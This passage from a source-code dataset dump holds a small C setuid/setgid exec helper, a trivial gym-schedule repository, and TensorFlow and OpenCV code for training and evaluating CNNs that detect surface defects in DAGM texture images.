"text": "/* set user and group id and exec */\n\n#include <stdnoreturn.h>\n#include <sys/types.h>\n\n#include <err.h>\n#include <grp.h>\n#include <pwd.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nstatic void parse_userspec(char *argv1, const char **user_p, const char **group_p)\n{\n char *user = argv1;\n char *group = strchr(user, ':');\n if (group)\n *group++ = '\\0';\n\n *user_p = user;\n *group_p = group;\n}\n\n/**\n * user != NULL, pw_p != NULL\n */\nstatic uid_t parse_user(const char *user, struct passwd **pw_p)\n{\n char *end;\n uid_t nuid = strtol(user, &end, 10);\n\n if (*end == '\\0') {\n *pw_p = getpwuid(nuid);\n return nuid;\n } else {\n *pw_p = getpwnam(user);\n if (*pw_p == NULL)\n err(1, \"getpwnam(%s)\", user);\n return (*pw_p)->pw_uid;\n }\n}\n\n/**\n * group != NULL\n */\nstatic gid_t parse_group(const char *group)\n{\n char *end;\n gid_t ngid = strtol(group, &end, 10);\n\n if (*end == '\\0')\n return ngid;\n else {\n struct group *gr = getgrnam(group);\n if (gr == NULL)\n err(1, \"getgrnam(%s)\", group);\n return gr->gr_gid;\n }\n}\n\n/**\n * user != NULL, glist_p != NULL\n *\n * After the call, *glist_p will point to heap memory,\n * and this call will return the number of elements in it.\n */\nint Getgrouplist(const char *user, gid_t gid, gid_t **glist_p)\n{\n int ngroups = 0;\n gid_t *glist = NULL;\n\n while (1) {\n int ret = getgrouplist(user, gid, glist, &ngroups);\n\n if (ret >= 0) {\n *glist_p = glist;\n return ngroups;\n }\n\n glist = realloc(glist, ngroups * sizeof(gid_t));\n if (glist == NULL)\n err(1, \"malloc\");\n }\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 3)\n errx(0, \"Usage: %s user-spec command [args]\", argv[0]);\n\n const char *user, *group;\n\n parse_userspec(argv[1], &user, &group);\n \n uid_t uid;\n struct passwd *pw = NULL;\n if (user[0] != '\\0')\n uid = parse_user(user, &pw);\n else {\n uid = getuid();\n pw = getpwuid(uid);\n }\n\n setenv(\"HOME\", pw != NULL ? pw->pw_dir : \"/\", 1);\n \n if (pw != NULL) {\n setenv(\"USER\", pw->pw_name, 1);\n setenv(\"LOGNAME\", pw->pw_name, 1);\n } else {\n char buffer[20]; // 20 is enough for a unsigned 64-bit integer\n snprintf((char*) &buffer, 20, \"%llu\", (unsigned long long) uid);\n\n setenv(\"USER\", (const char*) &buffer, 1);\n setenv(\"LOGNAME\", (const char*) &buffer, 1);\n }\n\n gid_t gid;\n if (group && group[0] != '\\0') {\n /* group was specified, ignore grouplist for setgroups later */\n pw = NULL;\n gid = parse_group(group);\n } else if (pw != NULL)\n gid = pw->pw_gid;\n else\n gid = getgid();\n\n if (pw == NULL) {\n if (setgroups(1, &gid) < 0)\n err(1, \"setgroups(%llu)\", (unsigned long long) gid);\n } else {\n gid_t *glist;\n int ngroups = Getgrouplist(pw->pw_name, gid, &glist);\n\n if (setgroups(ngroups, glist) < 0)\n err(1, \"setgroups\");\n\n free(glist);\n }\n\n if (setgid(gid) < 0)\n err(1, \"setgid(%i)\", gid);\n\n if (setuid(uid) < 0)\n err(1, \"setuid(%i)\", uid);\n\n char **cmdargv = &argv[2];\n execvp(cmdargv[0], cmdargv);\n err(1, \"%s\", cmdargv[0]);\n\n return 1;\n}\n"
}
] | 6 |
rbrown540/Final-Cloud-Project
|
https://github.com/rbrown540/Final-Cloud-Project
|
448ca4c666c88af19035d1aa19f4350a117c6dab
|
c2ef6062a685fe9cb98afd65581763c5ade1e24e
|
585f1fbd2d7c4861a9dd3078cad2c627c5e786d2
|
refs/heads/main
| 2023-03-12T18:04:23.495572 | 2021-02-19T15:41:51 | 2021-02-19T15:41:51 | 340,074,795 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7631579041481018,
"alphanum_fraction": 0.7894737124443054,
"avg_line_length": 18,
"blob_id": "3ed0d62e9864690af1675efaca6d619170e98ee6",
"content_id": "bd5e9d0c9936448584c79007d782bc44e945c833",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "rbrown540/Final-Cloud-Project",
"src_encoding": "UTF-8",
"text": "# Final-Cloud-Project\ndynamoDB and S3\n"
},
{
"alpha_fraction": 0.3415597379207611,
"alphanum_fraction": 0.4057255685329437,
"avg_line_length": 22.045454025268555,
"blob_id": "5e13640a4f7e4a33aaced2958ff6728723d69b6f",
"content_id": "9ff59d59de2bbdc08213ae40f26a42a6135a5b9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1013,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 44,
"path": "/group_schedule.py",
"repo_name": "rbrown540/Final-Cloud-Project",
"src_encoding": "UTF-8",
"text": "{\n\"Spin Cycle with Jesse\":\n {\n \"Monday\": [{\"0515\": \"30k 'Hello Week'\"\n }],\n \"Tuesday\": [{\"0915\": \"Hills and Core\"\n }],\n \"Thursday\": [{\"0915\": \"Core and Hills\"\n }],\n \"Friday\": [{\"0515\": \"500 cal Friday\"\n }]\n },\n\"Rock Solid\":\n {\n \"Monday\": [{\"0615\": \"Get up Get ready\"\n }],\n \"Tuesday\": [{\"0615\": \"Four for your Core\"\n }],\n \"Wednesday\": [{\"0615\": \"Mike Mike Mike, guess what day it is!\"\n }],\n \"Thursday\": [{\"0615\": \"Friday Junior\"\n }],\n \"Friday\": [{\"0615\": \"IT'S FINALLY OVER\"\n }]\n },\n\"Yoga Chill\":\n {\n \"Monday\": [{\"1015\": \"Shhh \"\n }],\n \"Tuesday\": [{\"1015\": \"More Shhh\"\n }],\n \"Thursday\": [{\"1015\": \"So, Much, Shhh\"\n }],\n \"Friday\": [{\"1015\": \" zzz \"\n }]\n },\n\"More Jesse Spin\":\n {\n \"Saturday\": [{\"0000\": \"You'll be okay!!\"\n }],\n \"Sunday\": [{\"0000\": \"What? Are you seriously NOT working out right now?\"\n }]\n }\n}"
}
] | 2 |
sjk0709/Defect-Inspection-for-DAGM
|
https://github.com/sjk0709/Defect-Inspection-for-DAGM
|
46a3f04c70569066eefba418c0947bb2e1902fc9
|
17fb0a3cf36776b321ceb535ca5214218baa119a
|
eedf4b61aba7c5ff2ee843df7a96f78737c227bb
|
refs/heads/master
| 2020-04-03T14:07:30.703631 | 2018-10-30T05:22:02 | 2018-10-30T05:22:02 | 155,311,458 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48276644945144653,
"alphanum_fraction": 0.49365079402923584,
"avg_line_length": 45.23928451538086,
"blob_id": "d65bd83948fcac35d6dfb20e305669b97ce28a4f",
"content_id": "81c6653c766710ed682b49beddd0bc1734d8d24f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13230,
"license_type": "permissive",
"max_line_length": 221,
"num_lines": 280,
"path": "/DAGM/DAGM_CNN_final/dagm_cnn_tf.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 24 10:56:53 2017\r\n\r\n@author: Jaekyung\r\n\"\"\"\r\nimport sys, os\r\nsys.path.append(os.pardir) # parent directory\r\nimport tensorflow as tf\r\nfrom tensorflow.python.tools import freeze_graph\r\nimport numpy as np\r\nimport time\r\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\r\n\r\nsys.path.append(\"./networks\") # parent directory\r\n\r\n\r\n\r\nimport jkcnn1 as network\r\n\r\n\r\ntf.set_random_seed(777) # reproducibility\r\n\r\n\r\nclass Commander :\r\n \r\n def __init__(self, data, Model, args):\r\n \r\n self.args = args\r\n \r\n self.featureH = self.args.feature_shape[0]\r\n self.featureW = self.args.feature_shape[1] \r\n self.featureC = self.args.feature_shape[2]\r\n\r\n #=====\r\n self.checkpoint_state_name = \"checkpoint_state\"\r\n self.saved_checkpoint = 'saved_checkpoint'\r\n self.input_graph_name = \"input_graph.pb\"\r\n self.output_graph_name = \"output_graph.pb\" \r\n \r\n \r\n # initialize\r\n self.sess = tf.Session() \r\n self._model = Model(self.sess, name=\"DAGM\", learning_rate=self.args.learning_rate, \r\n feature_shape=self.args.feature_shape, lable_size=self.args.label_size )\r\n \r\n self._data = data\r\n \r\n \r\n \r\n# if not os.path.exists('out/'):\r\n# os.makedirs('out/')\r\n #dir_path = os.path.dirname(os.path.realpath(__file__)) # To get the full path to the dirctory\r\n #cwd = os.getcwd() # To get the current working directory\r\n\r\n\r\n self.model_dir = \"models_tf/\"\r\n if not os.path.exists(self.model_dir):\r\n os.mkdir(self.model_dir) \r\n self.checkpoint_dir = self.model_dir + self.args.load_folder_file[0]\r\n if not os.path.exists(self.model_dir):\r\n os.mkdir(self.model_dir) \r\n \r\n \r\n #self.checkpoint_prefix = os.path.join(self.checkpoint_dir, '/ensemble_model'+str(self.start_model_num)+'_'+str(self.end_model_num))\r\n #print(self.checkpoint_prefix) \r\n \r\n self.input_graph_path = self.model_dir + self.args.load_folder_file[0] \r\n self.checkpoint_prefix = self.checkpoint_dir + self.saved_checkpoint\r\n self.checkpoint_prefix_backup = self.checkpoint_dir + self.saved_checkpoint +'_backup'\r\n self.checkpoint_prefix_optimal = self.checkpoint_dir + self.saved_checkpoint +'_optimal'\r\n self.input_checkpoint_path = self.checkpoint_prefix + \"-0\" \r\n\r\n self._saver = tf.train.Saver()\r\n checkpoint = tf.train.get_checkpoint_state(self.checkpoint_dir, latest_filename=self.checkpoint_state_name)\r\n\r\n self.sess.run(tf.global_variables_initializer())\r\n \r\n if self.args.load_model:\r\n if checkpoint and checkpoint.model_checkpoint_path:\r\n self._saver.restore(self.sess, checkpoint.model_checkpoint_path) \r\n print(\"|===============================================================================|\")\r\n print(\"|===== \" + checkpoint.model_checkpoint_path + \" has been loaded.=====|\")\r\n print(\"|===============================================================================|\")\r\n elif False:\r\n print(\"There are no models\")\r\n raise Exception(\"Could not load checkpoints for playback\")\r\n else:\r\n print(\"Frist training\")\r\n \r\n \r\n \r\n def recordTrainInformation(self, trainingEpochs, batchSize, minCost, maxAccuracy, elapsedTime): \r\n note = Element(\"TrainingInformation\")\r\n SubElement(note, \"TrainingEpochs\").text = str(trainingEpochs)\r\n SubElement(note, \"BatchSize\").text = str(batchSize) \r\n SubElement(note, \"MinCost\").text = str(minCost)\r\n SubElement(note, \"MaxAccuracy\").text = str(maxAccuracy)\r\n 
SubElement(note, \"ElapsedTime\").text = str(elapsedTime)\r\n dump(note) \r\n ElementTree(note).write(self.model_dir + \"training_imformation.xml\")\r\n \r\n def createModelInformationXML(self): \r\n note = Element(\"ModelSetting\")\r\n to = Element(\"ModelName\")\r\n to.text = self.args.load_folder_file[1] \r\n note.append(to)\r\n SubElement(note, \"FeatureWidth\").text = str(self.args.feature_shape[0])\r\n SubElement(note, \"FeatureHeight\").text = str(self.args.feature_shape[1]) \r\n SubElement(note, \"LabelSize\").text = str(self.args.label_size)\r\n dump(note) \r\n ElementTree(note).write(self.model_dir + self.args.load_folder_file[1] + \".xml\")\r\n \r\n \r\n def train(self, nReDataExtraction=5, training_epochs=20, batch_size=128):\r\n # Save our model\r\n tf.train.write_graph(self.sess.graph_def, self.checkpoint_dir, self.input_graph_name, as_text=True)\r\n \r\n start_time = time.perf_counter()\r\n minCost = 100000.\r\n maxAccuracy = 0.\r\n elapsed_time = 0.\r\n current_epoch = 0\r\n \r\n # train my model\r\n print('Learning Started!') \r\n \r\n self._data.getBlockImages(blockH=self.featureH, blockW=self.featureW,\r\n nOKperClass=40, nNGperClass=40,\r\n classNoList=self.args.classNoList, \r\n label_type='array', isTrain=False) \r\n \r\n current_accuracy = 0\r\n max_accuracy = self.args.optimalAccuracyThreshold\r\n for i in range(nReDataExtraction): \r\n \r\n self._data.getBlockImages(blockH=self.featureH, blockW=self.featureW, \r\n nOKperClass=160, nNGperClass=160, \r\n classNoList=self.args.classNoList, \r\n label_type='array', isTrain=True)\r\n \r\n for epoch in range(training_epochs):\r\n avg_cost = 0.0\r\n total_batch = int(self._data.train.num_examples / batch_size) \r\n \r\n for k in range(total_batch):\r\n batch_xs, batch_ys = self._data.train.next_batch(batch_size)\r\n # print(batch_xs.shape, batch_ys.shape)\r\n # train each model \r\n batch_xs = np.reshape(batch_xs, [-1, self.featureH, self.featureW, self.featureC])\r\n cost, _ = self._model.train(batch_xs, batch_ys)\r\n avg_cost += cost \r\n \r\n avg_cost /= total_batch \r\n \r\n if epoch % 10 == 0:\r\n # save parameters, training information and our model \r\n # save_path = saver.save(sess, checkpoint_path + '/network') \r\n save_path = self._saver.save(self.sess, self.checkpoint_prefix_backup, global_step=0, latest_filename=self.checkpoint_state_name) \r\n save_path = self._saver.save(self.sess, self.checkpoint_prefix, global_step=0, latest_filename=self.checkpoint_state_name) \r\n \r\n current_accuracy = self.test(testBatchSize=256)\r\n minCost = min(minCost, avg_cost)\r\n maxAccuracy = max(maxAccuracy, current_accuracy)\r\n print('--------------------------------------------------------------------')\r\n print(\"Current model has been saved.\")\r\n print('Epoch : %04d' % (i*training_epochs + epoch), ' | Cost =', avg_cost) \r\n print('--------------------------------------------------------------------')\r\n if current_accuracy >= max_accuracy:\r\n max_accuracy = current_accuracy \r\n save_path = self._saver.save(self.sess, self.checkpoint_prefix_optimal, global_step=0, latest_filename=self.checkpoint_state_name)\r\n break\r\n if current_accuracy >= max_accuracy:\r\n break\r\n \r\n # show all variables name\r\n# for op in tf.get_default_graph().get_operations():\r\n# print (str(op.name))\r\n \r\n elapsed_time = (time.perf_counter() - start_time)\r\n \r\n # Save training information and our model \r\n self.recordTrainInformation(current_epoch, batch_size, minCost, maxAccuracy, elapsed_time)\r\n 
tf.train.write_graph(self.sess.graph_def, self.model_dir, self.input_graph_name, as_text=True) \r\n \r\n print('=====================================================================')\r\n print('Minimum cost : ', minCost)\r\n print(\"Maximum accuracy : \", maxAccuracy)\r\n print('Elapsed %.3f seconds.' % elapsed_time)\r\n print('%.0f h' % (elapsed_time/3600), '%.0f m' % ((elapsed_time%3600)/60) , '%.0f s' % (elapsed_time%60) )\r\n print('Learning Finished!') \r\n print('=====================================================================')\r\n \r\n \r\n \r\n \r\n def test(self, testBatchSize=100):\r\n \r\n # Test model and check accuracy \r\n avg_accuracy = 0.0\r\n nIter = int(self._data.test.num_examples / testBatchSize) \r\n \r\n for i in range(nIter):\r\n testX, testY = self._data.test.next_batch(testBatchSize) \r\n testX = np.reshape(testX, [-1, self.featureH, self.featureW, self.featureC])\r\n accuracy = self._model.get_accuracy(testX, testY)\r\n avg_accuracy += accuracy \r\n \r\n avg_accuracy /= nIter\r\n# print('logits : ', self._model.predict(testX)) \r\n print('--------------------------------------------------------------------')\r\n print('Accuracy: %.2f' %(avg_accuracy*100.0), \"%\")\r\n print('--------------------------------------------------------------------')\r\n \r\n return avg_accuracy\r\n \r\n \r\n def freezeModel(self, output_node_names=\"prob\" ): \r\n # Note that we this normally should be only \"output_node\"!!!\r\n input_saver_def_path = \"\" \r\n input_binary = False \r\n restore_op_name = \"save/restore_all\"\r\n filename_tensor_name = \"save/Const:0\"\r\n input_graph_path = self.checkpoint_dir + self.input_graph_name \r\n output_graph_path = self.checkpoint_dir + self.output_graph_name\r\n clear_devices = False \r\n freeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\r\n input_binary, self.input_checkpoint_path,\r\n output_node_names, restore_op_name,\r\n filename_tensor_name, output_graph_path,\r\n clear_devices, False)\r\n \r\n # make XML\r\n self.createModelInformationXML()\r\n print('Freezing the model finished!')\r\n \r\n \r\nclass dotdict(dict):\r\n def __getattr__(self, name):\r\n return self[name]\r\n \r\n \r\nif __name__ == '__main__': \r\n \r\n print(\"Tensorflow version :\", tf.__version__)\r\n\r\n args = dotdict({\r\n# 'dataPath' : '../../../JKcloud/DB_JK/DAGM2007_dataset',\r\n 'dataPath' : '../../../JKcloud/DB_JK/DAGM_dataset',\r\n 'training' : False ,\r\n 'load_model': True, \r\n 'load_folder_file': ('DAGM2_jkcnn1_32_12/','saved_checkpoint-0'), \r\n 'optimalAccuracyThreshold' : 0.98,\r\n 'label_format' : 2,\r\n 'classNoList' : [1,2,3,4,5,6],\r\n 'feature_shape' : [32, 32, 1], # (H, W, C)\r\n 'label_size' : 12,\r\n 'nReDataExtraction' : 100,\r\n 'nTrainingEpochs': 50,\r\n 'batch_size' : 256, \r\n 'learning_rate' : 1e-4, \r\n })\r\n \r\n import dagmCV2 as DAGM\r\n \r\n# dagm = DAGM.DAGM(args.dataPath)\r\n dagm = DAGM.DAGM(args.dataPath, label_format=args.label_format)\r\n commander = Commander(data=dagm, Model=network.Model, args=args) \r\n# \r\n if(args.training==True):\r\n commander.train(nReDataExtraction=args.nReDataExtraction, training_epochs=args.nTrainingEpochs, batch_size=args.batch_size) \r\n commander.freezeModel()\r\n \r\n elif(args.training==False): \r\n# mode = int(input(\"1.training | 2.accuracy test | 3.Freeze a model : \"))\r\n \r\n commander._data.getBlockImages(blockH=args.feature_shape[0], blockW=args.feature_shape[1], \r\n nOKperClass=1, nNGperClass=1, classNoList=args.classNoList, \r\n label_type='array', 
isTrain=False) \r\n commander.test(100) \r\n\r\n"
},
{
"alpha_fraction": 0.5023980736732483,
"alphanum_fraction": 0.5172147750854492,
"avg_line_length": 34.1656608581543,
"blob_id": "eb6bfa12c3db172304cb384b84786aa3e069fef2",
"content_id": "e7ef6281ecfd9e785289e0850e009584c952c45b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11708,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 332,
"path": "/DAGM/DAGM_CNN_pytorch/dagmCV.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys, os\nsys.path.append(os.pardir) # parent directory\n#import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.gridspec as gridspec\nfrom sklearn.feature_extraction import image\n# from PIL import Image\nimport cv2\nimport glob\nimport random\nimport struct\n\n\n# PIL_JK class includes PIL util made by JK\n\nclass Data(object):\n def __init__(self):\n self.images = np.zeros(1)\n self.labels = np.zeros(1)\n self.start_batch = 0\n self.end_batch = 0\n self.num_examples = 0\n \n def next_batch(self, batch_size):\n mini_batch = np.random.choice(len(self.images), batch_size, replace=False)\n \n# self.end_batch = self.start_batch+batch_size\n# mini_batch = np.arange(self.start_batch, self.end_batch)\n# if self.end_batch!=len(self.images):\n# self.start_batch = self.end_batch\n# else :\n# self.start_batch = 0\n \n return self.images[mini_batch], self.labels[mini_batch]\n \n\ndef genImgListWithFilename(folderpath, imgType, start, end): # input : path # output : imgList # path안의 이미지들을 리스트로 만들어준다.\n imgList = [] \n for i in range(start, end+1):\n filepath = folderpath+ '/' + str(i) + '.' + imgType \n image = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n# cv2.imshow('ddd',image)\n# cv2.waitKey(0)\n imgList.append(image) \n return imgList \n\n\ndef cvRotateImg(img, angle): \n rows = img.shape[0]\n cols = img.shape[1]\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n image = cv2.warpAffine(img,M,(cols,rows))\n return image\n \n# data augmentation \ndef dataAugmentation(image):\n Xli = []\n \n verticalFlip = cv2.flip(image,1) # vertical flip \n for i in range(1, 5): \n augmentedImg1 = cvRotateImg(image, 90*i)\n augmentedImg2 = cvRotateImg(verticalFlip, 90*i)\n Xli.append(augmentedImg1) \n Xli.append(augmentedImg2) \n \n return Xli\n \nclass DAGM(object):\n \"\"\"\n \n \"\"\"\n def __init__(self, dataPath):\n self.dataPath = dataPath\n \n self.label_size = 12\n \n self._blockW = 32\n self._blockH = 32 \n self.nBlockPerImage = 5\n self.nOKimgPerClass = 80\n self.nNGimgPerClass = 80\n \n self.trainOKImgIndices = []\n self.testOKImgIndices = []\n self.trainNGImgIndices = [] \n self.testNGImgIndices = []\n for i in range(1, 701): self.trainOKImgIndices.append(i)\n for i in range(701, 1001): self.testOKImgIndices.append(i)\n for i in range(1, 106): self.trainNGImgIndices.append(i) \n for i in range(106, 151): self.testNGImgIndices.append(i)\n \n #readFreeImg()\n self.train = Data()\n self.test = Data() \n \n \n def extractBlocksInOK(self, classNo, isTrain=True ):\n \n tempXli = []\n tempYli = [] \n\n chosen_indices = ''\n \n classPath = self.dataPath + '/Class' + str(classNo) + '/'\n Y = np.zeros([self.label_size], dtype='float32') \n if self.label_size==12:\n Y[classNo-1] = 1\n elif self.label_size==13:\n Y[classNo] = 1\n \n\n if isTrain:\n if self.nOKimgPerClass>len(self.trainOKImgIndices):\n self.nOKimgPerClass=len(self.trainOKImgIndices)\n chosen_indices = random.sample(self.trainOKImgIndices, self.nOKimgPerClass) \n else:\n if self.nOKimgPerClass>len(self.testOKImgIndices):\n self.nOKimgPerClass=len(self.testOKImgIndices)\n chosen_indices = random.sample(self.testOKImgIndices, self.nOKimgPerClass)\n for imgNo in chosen_indices:\n Xpath = classPath + str(imgNo) + '.png' \n \n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n \n try:\n tempX = image.extract_patches_2d(tempX, (self._blockH, self._blockW), max_patches=self.nBlockPerImage) \n except:\n 
print(\"This image has a problem.\")\n print(Xpath)\n pass\n \n for j in range(self.nBlockPerImage):\n tempXli.append(tempX[j]/255.)\n tempYli.append(Y) \n \n return tempXli, tempYli \n \n def extractBlocksInNG(self, classNo, labelInfo, isTrain=True ):\n \n tempXli = []\n tempYli = [] \n\n chosen_indices = ''\n \n classPath = self.dataPath + '/Class' + str(classNo) + '_def/' \n Y = np.zeros([self.label_size], dtype='float32') \n if self.label_size==12:\n Y[classNo+5] = 1\n elif self.label_size==13:\n Y[classNo+6] = 1\n \n if self.nNGimgPerClass<8:\n self.nNGimgPerClass=8 \n \n if isTrain:\n numNGimgPerClass = int(self.nNGimgPerClass/8.) \n if numNGimgPerClass>len(self.trainNGImgIndices):\n numNGimgPerClass=len(self.trainNGImgIndices) \n chosen_indices = random.sample(self.trainNGImgIndices, numNGimgPerClass) \n \n else: \n numNGimgPerClass = int(self.nNGimgPerClass/8.)\n if numNGimgPerClass>len(self.testNGImgIndices):\n numNGimgPerClass=len(self.testNGImgIndices) \n chosen_indices = random.sample(self.testNGImgIndices, numNGimgPerClass)\n\n for imgNo in chosen_indices:\n \n Xpath = classPath + str(imgNo) + '.png'\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n lastX = tempX.shape[1]-self._blockW-1\n lastY = tempX.shape[0]-self._blockH-1\n \n tempInfo = labelInfo[imgNo-1]\n semi_major = float(tempInfo[1]) # semi-major axis\n semi_minor = float(tempInfo[2]) # semi-minor axis \n rotAngle = float(tempInfo[3]) # rotation angle\n cx = float(tempInfo[4]) # x of the centre\n cy = float(tempInfo[5]) # y of the centre\n \n for j in range(self.nBlockPerImage):\n \n theta = random.uniform(0, 2*np.pi)\n x = random.uniform(0, semi_major)*np.cos(theta)\n y = random.uniform(0, semi_minor)*np.sin(theta)\n xp = x*np.cos(rotAngle) - y*np.sin(rotAngle)\n yp = x*np.sin(rotAngle) + y*np.cos(rotAngle)\n xp = int(cx + xp)\n yp = int(cy + yp)\n \n left = xp-int(0.5*self._blockW)\n top = yp-int(0.5*self._blockH)\n \n if(left<0 ):\n left = 0\n if(left>lastX):\n left = lastX\n if(top<0):\n top = 0\n if(top>lastY ):\n top = lastY \n \n start_x = left\n end_x = left+self._blockW\n start_y = top\n end_y = top +self._blockH \n \n cropX = tempX[start_y:end_y, start_x:end_x]\n \n # data augmentation \n tempXli += dataAugmentation(cropX/255.)\n for k in range(8): tempYli.append(Y)\n \n # data augmentation \n# for i in range(1, 5): \n# for j in [True, False]:\n# augmentedImg = cvRotateImg(original, 90*i)\n# if j:\n# augmentedImg = cv2.flip(augmentedImg,0) # horizontal flip\n# Xli.append(augmentedImg/255.)\n# Yli.append(Y)\n \n \n# print(\"the number of images without defect : \", len(tempXli)) # the number of defective free images\n \n return tempXli, tempYli \n \n def getBlockImages(self, blockH, blockW, nOKperClass, nNGperClass, \n classNoList, label_type='array', isTrain=False):\n# def genBlockData(self, block_size, nOKimgPerClass=160, nNGimgPerClass=160, isTrain=True):\n\n self._blockH = blockH\n self._blockW = blockW\n self.nOKimgPerClass = nOKperClass\n self.nNGimgPerClass = nNGperClass\n \n dataX = [] \n dataY = []\n \n for classNo in range(1, 7):\n \n # OK\n bufferX, bufferY = self.extractBlocksInOK(classNo, isTrain=isTrain)\n dataX += bufferX # training set X\n dataY += bufferY # training set Y \n \n # NG\n labelInfoPath = self.dataPath + '/Class' + str(classNo) + '_def/' \n labelInfoFile = open(labelInfoPath+'labels.txt', 'r') \n labelInfoList = []\n for i in range(150): \n labelInfoList.append( labelInfoFile.readline().split() )\n \n bufferX, bufferY = self.extractBlocksInNG(classNo, labelInfoList, 
isTrain=isTrain)\n dataX += bufferX # training set X\n dataY += bufferY # training set Y \n \n dataX = np.array(dataX, dtype=np.float32)\n dataY = np.array(dataY, dtype=np.float32)\n \n if isTrain:\n self.train.images = dataX\n# self.train.images = self.train.images.reshape(-1, blockW*blockH*1)\n self.train.images = self.train.images.reshape(-1, self._blockH, self._blockW, 1)\n self.train.labels = dataY\n self.train.num_examples = self.train.images.shape[0]\n print(\"Train images shape :\", self.train.images.shape)\n print(\"Train labels shape :\", self.train.labels.shape)\n else :\n self.test.images = dataX\n# self.test.images = self.test.images.reshape(-1, blockW*blockH*1)\n self.test.images = self.test.images.reshape(-1, self._blockH, self._blockW, 1)\n self.test.labels = dataY\n self.test.num_examples = self.test.images.shape[0]\n print(\"Test images shape :\", self.test.images.shape)\n print(\"Test labels shape :\", self.test.labels.shape)\n \n \n \n \n \n\n \n \nif __name__ == '__main__': \n \n\n dataPath = '../DAGM2007_dataset'\n\n \n dagm = DAGM(dataPath) \n \n batch_size = 10\n \n for i in range(10):\n trainX, trainY = dagm.train.next_batch(batch_size)\n print(trainX.shape)\n #print(trainX)\n print(trainY.shape)\n #print(trainY)\n print('-----------------------------------------------------')\n\n \n images = dagm.train.images\n labels = dagm.train.labels\n print(images.shape)\n print(labels.shape)\n \n# dagm.genImgWithoutDefect()\n\n# dagm.genImgArr()\n# dagm.genImgArrWithoutDefect()\n# dagm.genImgArrWithDefect()\n#\n#\n\n# dagm.readImgWithoutDefect(1)\n# trainX = dagm.train.images\n# trainY = dagm.train.labels\n# print(trainX[0])\n# print(trainY[0])\n# trX, trY = dagm.train.next_batch(5)\n# print(dagm.train.num_examples)\n# print( trX.shape, trY.shape)\n# X = trainX[0].reshape(32,32)\n# plt.imshow(np.array(X), cmap=plt.get_cmap('gray')) \n# plt.show()\n# \n"
},
{
"alpha_fraction": 0.5746110081672668,
"alphanum_fraction": 0.5977723002433777,
"avg_line_length": 28.98404312133789,
"blob_id": "a5e1bc95585f350c9e40df56f81cb0ad964588a3",
"content_id": "9b338804b62ad44335c57b736ff49bb878bf8836",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5656,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 188,
"path": "/DAGM/DAGM_CNN_final/dagm_cnn_evaluation.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport time\nimport glob\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport tensorflow as tf\n#import torch\n#import torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\n#from torch.utils.data import TensorDataset\n#from torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\nimport cv2\n\nsys.path.append(\"../../ML_utils\")\nimport JK_image\n\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\nsys.path.append(\"networks\") # parent directory\n\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch).cuda()\n else :\n array_torch = Variable(array_torch).cpu()\n return array_torch\n\ndef detectDefect( args, result_type=1, isResultSave=True):\n \n # images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n \n blockW = args.feature_shape[0]\n blockH = args.feature_shape[1]\n blockC = args.feature_shape[2]\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n \n model_dir = \"models_tensorflow/\"\n if not os.path.exists(model_dir):\n os.mkdir(model_dir) \n checkpoint_dir = model_dir + args.load_folder_file[0]\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n# latest_filename = \"checkpoint_state\"\n\n sess 